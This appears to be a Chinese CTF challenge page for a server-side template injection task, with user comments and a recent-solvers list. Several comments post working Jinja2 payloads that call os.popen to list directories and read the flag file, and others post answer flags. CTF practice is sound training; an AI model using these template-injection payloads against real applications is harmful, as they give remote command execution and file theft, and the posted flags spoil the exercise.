Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15938
提  示:
描  述:
Simple_SSTI_2
评论
starrabbit 2年前

也可通过tplmap工具直接获取权限

回复 1

hxl223 2年前

flag{23de1e599ad6abcc6c446e355e72c807}

回复 1

nepw 2年前

通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件 通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 通过{{ config.__c

回复 1

DK2021 2年前

/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

回复 1

453137 2年前

flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

回复 0

earlyyue 2年前

/?flag={{lipsum.__globals__.os.popen('cat /app/flag').read()}}

回复 4

氕氘氚 2年前

flag{0c6e1431cbe4e002c413bcaa0e5dfa51}

回复 0

mcreterro 2年前

flag{e4b09223a5f6e916f2865c0548458616}

回复 0

T0ybox 2年前

flag{bced55366c4d2bffa9715f2563a2799b}

回复 0

Joyoo 2年前

flag{0c1223db987a466bc858703ed23bc157}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

zhangq1022 攻破了该题 11小时前
yuloong 攻破了该题 11小时前
15080841307 攻破了该题 13小时前
leefghjs 攻破了该题 1天前
17778438489 攻破了该题 1天前
MD 攻破了该题 5天前
call1ng 攻破了该题 6天前
junmoo 攻破了该题 6天前
clannad 攻破了该题 7天前
19513396653 攻破了该题 8天前
HK1ng 攻破了该题 10天前
sun_space 攻破了该题 10天前
ct1640 攻破了该题 11天前
zypts 攻破了该题 12天前
288728 攻破了该题 14天前
看writeup刷题 攻破了该题 15天前
冯123456 攻破了该题 16天前
小城阿扬 攻破了该题 17天前
smtall 攻破了该题 19天前
3028545694 攻破了该题 20天前
问题反馈